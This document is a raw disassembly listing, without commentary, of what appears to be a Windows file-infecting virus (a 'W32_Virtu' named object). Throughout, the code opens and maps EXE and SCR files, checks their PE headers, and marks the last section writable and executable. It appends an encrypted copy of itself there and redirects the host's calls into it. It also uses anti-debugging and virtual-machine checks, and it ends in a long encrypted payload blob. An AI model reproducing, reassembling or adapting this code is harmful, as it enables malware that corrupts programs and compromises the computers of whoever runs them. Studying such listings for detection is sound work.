mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_4236F9
test dword ptr [ebp+403431h], 20000000h
jz short loc_4236BF
loc_4236B2: ; CODE XREF: .rsrc:004236BD�j
test edi, 3
jz short loc_4236BF
mov al, 90h
stosb
jmp short loc_4236B2
; ---------------------------------------------------------------------------
loc_4236BF: ; CODE XREF: .rsrc:004236B0�j
; .rsrc:004236B8�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_4236ED
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_4236F7
; ---------------------------------------------------------------------------
loc_4236ED: ; CODE XREF: .rsrc:004236DF�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_4236F7: ; CODE XREF: .rsrc:004236EB�j
stosw
loc_4236F9: ; CODE XREF: .rsrc:004236A4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_423778
test dword ptr [ebp+403431h], 20000000h
jz short loc_42371E
loc_423711: ; CODE XREF: .rsrc:0042371C�j
test edi, 3
jz short loc_42371E
mov al, 90h
stosb
jmp short loc_423711
; ---------------------------------------------------------------------------
loc_42371E: ; CODE XREF: .rsrc:0042370F�j
; .rsrc:00423717�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399A[ebp]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_423747
lea eax, [ebp+403429h]
loc_42373F: ; CODE XREF: .rsrc:00423745�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_42373F
loc_423747: ; CODE XREF: .rsrc:00423737�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_42375C
mov ax, 0C031h
stosw
loc_42375C: ; CODE XREF: .rsrc:00423754�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_423775
mov ax, 0C031h
stosw
loc_423775: ; CODE XREF: .rsrc:0042376D�j
mov al, 0C3h
stosb
loc_423778: ; CODE XREF: .rsrc:00423703�j
lea eax, loc_40343C[ebp]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_423790
push edi
sub edi, eax
pop eax
jmp short loc_4237A9
; ---------------------------------------------------------------------------
loc_423790: ; CODE XREF: .rsrc:00423788�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_4237A9: ; CODE XREF: .rsrc:0042378E�j
mov dword ptr ss:loc_40106D[ebp], edi
mov edi, dword ptr ss:loc_403986[ebp]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_4237C9
neg eax
loc_4237C9: ; CODE XREF: .rsrc:004237C5�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_4237CD proc near ; CODE XREF: sub_423BF9+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_4239B5
call near ptr loc_4237ED+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_4237ED: ; CODE XREF: sub_4237CD+F�p
add bh, bh
sub_4237CD endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_422F07
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov dword ptr ss:loc_4039C6[ebp], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_422F07
mov edi, [ebp+4039A6h]
push esi
call sub_422F07
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4239B5
jz loc_4239B5
add esi, dword ptr ss:loc_4039AA[ebp]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_423986
loc_423867: ; CODE XREF: sub_423986+29�j
lodsb
cmp al, 0E8h
jnz loc_423912
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_422F07
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_423895
cmp eax, [edi+0Ch]
jnb loc_4239AE
jmp short loc_4238A1
; ---------------------------------------------------------------------------
loc_423895: ; CODE XREF: sub_423986-FE�j
cmp [ebp+4039A6h], edx
jnz loc_4239AE
loc_4238A1: ; CODE XREF: sub_423986-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_4239AE
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_422F07
cmp [ebp+4039A6h], edi
jnz loc_4239AE
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4239AE
cmp eax, [edi+8]
jnb loc_4239AE
loc_4238EA: ; CODE XREF: sub_423986+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr ss:loc_4039BE[ebp]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_4239C4
jmp loc_4239AE
; ---------------------------------------------------------------------------
loc_423912: ; CODE XREF: sub_423986-11C�j
cmp al, 0FFh
jnz loc_4239AE
cmp byte ptr [esi], 15h
jnz loc_4239AE
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_422F07
cmp [ebp+4039A6h], edi
jnz short loc_4239AE
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_42395B
cmp eax, dword ptr ss:loc_4039C6[ebp]
jb short loc_4239C4
loc_42395B: ; CODE XREF: sub_423986-35�j
cmp eax, 70000000h
jb short loc_423999
call sub_423986
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_423985
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4239A0
; ---------------------------------------------------------------------------
locret_423985: ; CODE XREF: sub_423986-F�j
retn
; END OF FUNCTION CHUNK FOR sub_423986
; =============== S U B R O U T I N E =======================================
sub_423986 proc near ; CODE XREF: sub_423986-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 00423867 SIZE 0000011F BYTES
pop dword ptr ss:locret_403992[ebp]
pusha
mov esi, [ebp+403972h]
call sub_42300E
popa
loc_423999: ; CODE XREF: sub_423986-26�j
test eax, 80000000h
jnz short loc_4239AE
loc_4239A0: ; CODE XREF: sub_423986-3�j
sub eax, [edi+0Ch]
jb short loc_4239AE
cmp eax, [edi+8]
jb loc_4238EA
loc_4239AE: ; CODE XREF: sub_423986-F9�j
; sub_423986-EB�j ...
dec ecx
jnz loc_423867
loc_4239B5: ; CODE XREF: sub_4237CD+9�j
; .rsrc:0042384F�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_423A00
; ---------------------------------------------------------------------------
loc_4239C4: ; CODE XREF: sub_423986-7F�j
; sub_423986-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_423A00: ; CODE XREF: sub_423986+3C�j
pop edi
pop esi
retn
sub_423986 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423A03 proc near ; CODE XREF: .rsrc:00423BD1�p
; sub_423BF9+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr ss:locret_40357C[ebp]
cmp eax, 0FFFFFFFFh
jz locret_423AD4
mov dword ptr ss:loc_403952[ebp], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_423AD4
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr ss:loc_40355C[ebp]
cmp eax, 0FFFFFFFFh
jz loc_423F8C
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, loc_403962[ebp]
push ecx
push edx
push 0
push eax
call dword ptr ss:loc_403584[ebp]
cmp eax, 0FFFFFFFFh
jz loc_423F80
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_423F80
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_423F80
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr ss:loc_4035A0[ebp]
test eax, eax
jz loc_423F58
mov [ebp+403972h], eax
locret_423AD4: ; CODE XREF: sub_423A03+10�j
; sub_423A03+27�j ...
retn
sub_423A03 endp
; =============== S U B R O U T I N E =======================================
sub_423AD5 proc near ; CODE XREF: sub_423BF9+117�p
; sub_423BF9+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_423AEF
add eax, dword ptr ss:loc_40106D[ebp]
loc_423AEF: ; CODE XREF: sub_423AD5+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, dword ptr ss:loc_40106D[ebp]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_423AD5 endp
; =============== S U B R O U T I N E =======================================
sub_423B1A proc near ; CODE XREF: sub_423BF9:loc_423C48�p
; sub_423BF9+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_423B1F: ; CODE XREF: sub_423B1A+23�j
jecxz short locret_423B56
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_423B56
cmp dword ptr [edx+0Ch], 1
jb short loc_423B1F
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_423B56: ; CODE XREF: sub_423B1A:loc_423B1F�j
; sub_423B1A+1D�j ...
retn
sub_423B1A endp
; =============== S U B R O U T I N E =======================================
sub_423B57 proc near ; CODE XREF: .rsrc:00423BE3�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_423B57 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423B64: ; CODE XREF: .rsrc:00423B85�j
mov ecx, edi
jmp short loc_423B73
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_423B6F: ; CODE XREF: .rsrc:00423B81�j
mov ebx, edi
xor ecx, ecx
loc_423B73: ; CODE XREF: .rsrc:00423B66�j
; .rsrc:00423B89�j
lodsb
cmp al, 61h
jb short loc_423B7E
cmp al, 7Ah
ja short loc_423B7E
sub al, 20h
loc_423B7E: ; CODE XREF: .rsrc:00423B76�j
; .rsrc:00423B7A�j
stosb
cmp al, 5Ch
jz short loc_423B6F
cmp al, 2Eh
jz short loc_423B64
cmp al, 0
jnz short loc_423B73
jecxz short locret_423B56
mov eax, [ecx]
cmp eax, 455845h
jz short loc_423BA1
cmp eax, 524353h
jnz locret_423AD4
loc_423BA1: ; CODE XREF: .rsrc:00423B94�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_423AD4
cmp eax, 4E554357h
jz locret_423AD4
cmp eax, 32334357h
jz locret_423AD4
cmp eax, 4F545350h
jz locret_423AD4
xor ebx, ebx
call sub_423A03
jz locret_423AD4
xor edx, edx
call sub_423BF9
call sub_423B57
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_423F36
; =============== S U B R O U T I N E =======================================
sub_423BF9 proc near ; CODE XREF: .rsrc:00423BDE�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_423F36
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_423F36
test dword ptr [ebx+16h], 2000h
jnz loc_423F36
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_423F36
jecxz short loc_423C48
cmp ecx, 101h
jbe loc_423F36
loc_423C48: ; CODE XREF: sub_423BF9+41�j
call sub_423B1A
jb loc_423F36
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_422752
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_423C72: ; CODE XREF: sub_423BF9+92�j
push 20h
dec cl
pop eax
js short loc_423C8D
call sub_422752
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_423C72
; ---------------------------------------------------------------------------
loc_423C8D: ; CODE XREF: sub_423BF9+7E�j
; sub_423BF9+CD�j ...
push 6
pop ecx
loc_423C93: ; CODE XREF: sub_423BF9+B8�j
push 6
pop eax
call sub_422752
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_423C93
test dword ptr [ebp+403431h], 8
jnz short loc_423CC8
cmp byte ptr [ebp+40342Bh], 1
jz short loc_423C8D
loc_423CC8: ; CODE XREF: sub_423BF9+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_423CEF
cmp byte ptr [ebp+403429h], 5
jz short loc_423C8D
cmp byte ptr ss:loc_40342A[ebp], 5
jz short loc_423C8D
cmp byte ptr [ebp+40342Bh], 5
jz short loc_423C8D
loc_423CEF: ; CODE XREF: sub_423BF9+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_423D04
cmp byte ptr [ebp+403429h], 2
ja short loc_423C8D
loc_423D04: ; CODE XREF: sub_423BF9+100�j
and dword ptr [ebp+4039AEh], 0
call loc_42319F
call sub_423AD5
call sub_423F3F
mov ebx, [ebp+403976h]
call sub_423A03
jz loc_423F36
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_423B1A
jb loc_423F36
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_423D6C
lea esi, loc_40343C[ebp]
mov ecx, dword ptr ss:loc_40106D[ebp]
rep movsb
loc_423D6C: ; CODE XREF: sub_423BF9+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_423D80
rep movsb
loc_423D80: ; CODE XREF: sub_423BF9+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_423E38
push dword ptr [ebx+28h]
call sub_422F07
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_423E38
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_423DBD
xor ecx, ecx
loc_423DBD: ; CODE XREF: sub_423BF9+1C0�j
add esi, [edx+14h]
cmp ecx, dword ptr ss:loc_40106D[ebp]
mov ecx, dword ptr ss:loc_40106D[ebp]
jb short loc_423E24
mov edi, [esp+14h+var_14]
and dword ptr ss:loc_40106D[ebp], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, dword ptr ss:loc_403986[ebp]
test dword ptr [ebp+403431h], 40h
jz short loc_423DFD
neg dword ptr [eax]
loc_423DFD: ; CODE XREF: sub_423BF9+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_423E1B
neg dword ptr [eax]
loc_423E1B: ; CODE XREF: sub_423BF9+21E�j
push ecx
call sub_423AD5
pop ecx
jmp short loc_423E30
; ---------------------------------------------------------------------------
loc_423E24: ; CODE XREF: sub_423BF9+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_423E30: ; CODE XREF: sub_423BF9+229�j
lea esi, loc_40343C[ebp]
rep movsb
loc_423E38: ; CODE XREF: sub_423BF9+191�j
; sub_423BF9+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_423E51
imul edx, 12345678h
loc_423E51: ; CODE XREF: sub_423BF9+250�j
mov [eax-1], dl
call sub_421E25
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_423E82
mov [ebp+4039AEh], ecx
add eax, dword ptr ss:loc_40106D[ebp]
and dword ptr [edi+6Dh], 0
loc_423E82: ; CODE XREF: sub_423BF9+274�j
sub eax, [ebx+28h]
push dword ptr ss:loc_40397E[ebp]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_423EA7
push edx
call sub_4237CD
pop edx
loc_423EA7: ; CODE XREF: sub_423BF9+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_423EB2
mov [ebx+28h], ecx
loc_423EB2: ; CODE XREF: sub_423BF9+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_423EC3
mov [edx+8], ecx
loc_423EC3: ; CODE XREF: sub_423BF9+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_423EF4
add ecx, dword ptr ss:loc_40106D[ebp]
loc_423EF4: ; CODE XREF: sub_423BF9+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_423F16
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_423F16
mov dh, [ebp+403430h]
loc_423F16: ; CODE XREF: sub_423BF9+307�j
; sub_423BF9+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_423F2D
loc_423F22: ; CODE XREF: sub_423BF9+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_423F22
jmp short loc_423F36
; ---------------------------------------------------------------------------
loc_423F2D: ; CODE XREF: sub_423BF9+327�j
; sub_423BF9+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_423F2D
loc_423F36: ; CODE XREF: .rsrc:00423BF4�j
; sub_423BF9+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_423BF9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423F3F proc near ; CODE XREF: sub_423BF9+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_423AD4
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_423F58: ; CODE XREF: sub_423A03+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, loc_403962[ebp]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_423F80: ; CODE XREF: sub_423A03+6B�j
; sub_423A03+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_423F8C: ; CODE XREF: sub_423A03+45�j
lea esi, [ebp+40384Eh]
push dword ptr ss:loc_403952[ebp]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_423F3F endp
; ---------------------------------------------------------------------------
db 0E8h
dd 0
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 1070203h, 692D0605h
dd 4BA4CB80h, 200415FFh, 900040h, 3Fh dup(0)
dd 47000000h, 0AD7C809Bh, 317C8308h, 0A07C9103h, 7C80ADh
dd 2 dup(0)
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 0EC7C80C0h, 3C7C80E7h
dd 777C8115h, 457C810Ah, 0A17C831Ch, 0FF7C80B6h, 0CA7C8608h
dd 0DA7C835Dh, 0DE7C8111h, 777C812Ah, 57C801Dh, 767C80B9h
dd 0E17C80BBh, 0E57C8309h, 587C863Dh, 827C863Fh, 0B87C8127h
dd 427C831Ch, 1C7C8024h, 747C810Bh, 517C80B9h, 877C809Ah
dd 607C810Dh, 827C90D4h, 547C90D6h, 697C90D7h, 937C90D7h
dd 557C90D7h, 0FD7C90DCh, 907C90DCh, 0B67C90DDh, 327C90DEh
dd 0C67C90EAh, 7C9130h, 15h dup(0)
a68:
unicode 0, <68>
dw 42BCh
aB db 'B',0
dd offset dword_41FB50+50Ch
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 6900h, 0Ch dup(0)
dd 421C6300h, 267Ah dup(0)
; ---------------------------------------------------------------------------
cld
call loc_42E02E
; =============== S U B R O U T I N E =======================================
sub_42E006 proc near ; CODE XREF: .rsrc:0042E07D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_42E00E: ; CODE XREF: sub_42E006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_42E00E
pop ebx
retn
sub_42E006 endp
; ---------------------------------------------------------------------------
fcmove st, st(6)
loc_42E01F: ; CODE XREF: .rsrc:0042E068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42E021: ; CODE XREF: .rsrc:0042E036�j
; .rsrc:0042E047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_42E055
; =============== S U B R O U T I N E =======================================
sub_42E02B proc near ; CODE XREF: .rsrc:0042E04A�p
; .rsrc:0042E050�p
rdtsc
retn
sub_42E02B endp
; ---------------------------------------------------------------------------
loc_42E02E: ; CODE XREF: .rsrc:0042E001�p
test eax, eax
jnz short loc_42E03A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_42E021
jmp short loc_42E049
; ---------------------------------------------------------------------------
loc_42E03A: ; CODE XREF: .rsrc:0042E030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_42E021
loc_42E049: ; CODE XREF: .rsrc:0042E038�j
push ebp
call sub_42E02B
xchg eax, ecx
call sub_42E02B
loc_42E055: ; CODE XREF: .rsrc:0042E029�j
sub eax, ecx
mov ebp, [esp+4] ; CODE XREF: .rsrc:0042E087�j
sub dword ptr [esp+4], 0C406h
sub eax, 100h
jnb short loc_42E01F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_42E006
xor esi, ecx
and esi, ebp
cmpsd
jg short near ptr loc_42E057+2
mov cl, 2Ch
rol byte ptr ds:9848B205h, 1
out dx, al
daa
push es
inc esp
int 0CDh ; used by BASIC while in interpreter
sbb esp, ebp
hlt
; ---------------------------------------------------------------------------
dw 2FCEh
dd 5134166Fh, 6E3812CCh, 34D2FA7Dh, 1AFA8FD3h, 0E2191162h
dd 0B9BE6946h, 72AF292h, 0EE1C4E59h, 0E955BB15h, 779A7470h
dd 75851034h, 0ACCC57C5h, 56AC86D3h, 1462A84h, 2C845D27h
dd 5459726Dh, 89676F2Eh, 0D2D8B09Bh, 202608C5h, 4FE235Bh
dd 29703382h, 7964A0FFh, 0F1F5F623h, 0E8E2C7CBh, 263E1111h
dd 85966F58h, 0C79C83B1h, 0B8CCBD91h, 0E5DE3FC6h, 8E97B157h
dd 582C2568h, 0BEA16A62h, 0EDFEDCD7h, 0E7C43262h, 0F2298F82h
dd 0A065B383h, 0AE365C58h, 3B5B0AC5h, 2C775153h, 0EE4C2A9h
dd 0E5CFFCFh, 74622DA7h, 85A85151h, 0C9E3EC82h, 0ED921A3h
dd 1B257B59h, 0D14D5676h, 3A769CAEh, 462C081h, 36C6EDC0h
dd 585B4F2Ch, 0A2ACB242h, 89C1D7FEh, 8AD71D5Dh, 0BD130916h
dd 0B1BD09C2h, 0DE3B8A8Fh, 37180285h, 0AAC0DAE1h, 0CCA184E0h
dd 237012Eh, 0B9EF62D3h, 4169F37Bh, 7888271Eh, 0A69AC5E5h
dd 0EAD07E6Bh, 0F7CC371Bh, 8D3034D1h, 884E4456h, 75F802CBh
dd 9AA0C61Fh, 295D28FFh, 83311B5Dh, 9C9BD1C5h, 16A5EFE7h
dd 0B1851327h, 0E496BCDFh, 46AA9A68h, 5AE83E3Dh, 0CF15B879h
dd 0A63A6061h, 0C9E3BC86h, 6D07B283h, 2B3D4EE5h, 0D3338505h
dd 0F1879DBDh, 1521ABC3h, 317D0DFFh, 576D244Ah, 2840ACDAh
dd 448B38C9h, 42610E36h, 908FB94Ch, 0D49B7B09h, 3A69DC60h
dd 171E472Fh, 5E5313F0h, 0EB6FA5B2h, 0D19D1E86h, 0B83862E4h
dd 9FE8F94h, 6413523Dh, 35BAE4E6h, 5F6389E7h, 0E699CD38h
dd 35B4EACAh, 82D98C4Ah, 68062C31h, 0ABC684DCh, 3E577985h
dd 0F1E8E72Eh, 0F6A8A580h, 4E5279E8h, 166EDE29h, 0C8A4FAFAh
dd 494C7370h, 0DA1789DCh, 9F77C5FBh, 0AA486E74h, 0EBF115B7h
dd 77C3C0AFh, 0C2490364h, 0D5C07B82h, 4D6450BFh, 1B3BD9EBh
dd 0D0E70D21h, 88923B3Dh, 313FB762h, 8DAC080Bh, 82C7FDF7h
dd 729CFA3h, 66500335h, 7CB6BB13h, 98A29C65h, 0CEE7D186h
dd 9F13AB19h, 20294D95h, 0E5784A79h, 7D7AA093h, 1B2110C8h
dd 0B94E7AF5h, 9274AAB2h, 93924237h, 0BFF5C0C9h, 43572918h
dd 0EEE83D72h, 3DB0E5EBh, 63688CAEh, 2080B2B6h, 0C546DFD6h
dd 0D8E7078Eh, 860B0113h, 80985F5Ch, 59A37D8Ah, 19822433h
dd 20ADD3DEh, 647AFD00h, 0FD8FDA2Eh, 8E254B59h, 0F3D0774Fh
dd 0F6CA0BA5h, 9FA3362Fh, 49B0F576h, 7D7E1B22h, 99AEE84Fh
dd 33B87490h, 7075991Dh, 12998FEFh, 0C69F2D0h, 0E414EE16h
dd 5613B5BEh, 0DE3D6366h, 0DEE60DF6h, 0AB700835h, 0FFB35E51h
dd 1170760h, 28EC04Dh, 6A595ABAh, 0B88BFB07h, 0F69DC1ACh
dd 143BC3E0h, 0CDCA45FEh, 72F2A5A7h, 0E0D7B01Dh, 457B9006h
dd 7179D2A6h, 0B144484Bh, 68CEB779h, 0ADF7DAFh, 9EE7A0EDh
dd 0D6C4803Bh, 676DF3CCh, 107CF0CAh, 0B9D42061h, 62678DFBh
dd 5A505C34h, 0E4B6B4B7h, 71E81271h, 85523007h, 0FBDA9824h
dd 0D35B81E9h, 8A0440E6h, 0C0A8B817h, 1571184h, 0AF962447h
dd 0CEA7CDB5h, 0B23A277Eh, 786CE077h, 0C1A2F8E3h, 48B4F421h
dd 0EFF527A5h, 98284EC9h, 0F8465C62h, 0E9EF1D0Eh, 376B5148h
dd 2B418AEDh, 66671025h, 8CA3ADBBh, 0A0B18299h, 0DDD5125Dh
dd 0C71B4BE5h, 0C7376D4Ch, 0D7E0061Fh, 0EBE6C0FDh, 5B62282Fh
dd 0BDB2776Ah, 2CE1CDCEh, 46583F35h, 3385FBBCh, 45557D33h
dd 0C3A2C44Fh, 97CFC5D3h, 1A58F4F5h, 8CB4B8B5h, 47C9DFDFh
dd 5407C75Ch, 42192BD3h, 0D71762B8h, 7784C096h, 5C153B40h
dd 0DAD8A78Ch, 1336EBE7h, 66664352h, 0B3D2BA81h, 81F579DBh
dd 8E091F1Dh, 0F8E7811Bh, 0A80DD6D8h, 302F50A4h, 0B96F52DAh
dd 9FC185D4h, 90FD1307h, 5CA4A6D4h, 7C6370E8h, 0F5D0A726h
dd 0B636C7CEh, 6246F996h, 7B0C4E74h, 97ACEE99h, 0E5C69D42h
dd 0E8DE38F7h, 6EC0E9C2h, 0A6C33FEh, 96298A14h, 7511FEE0h
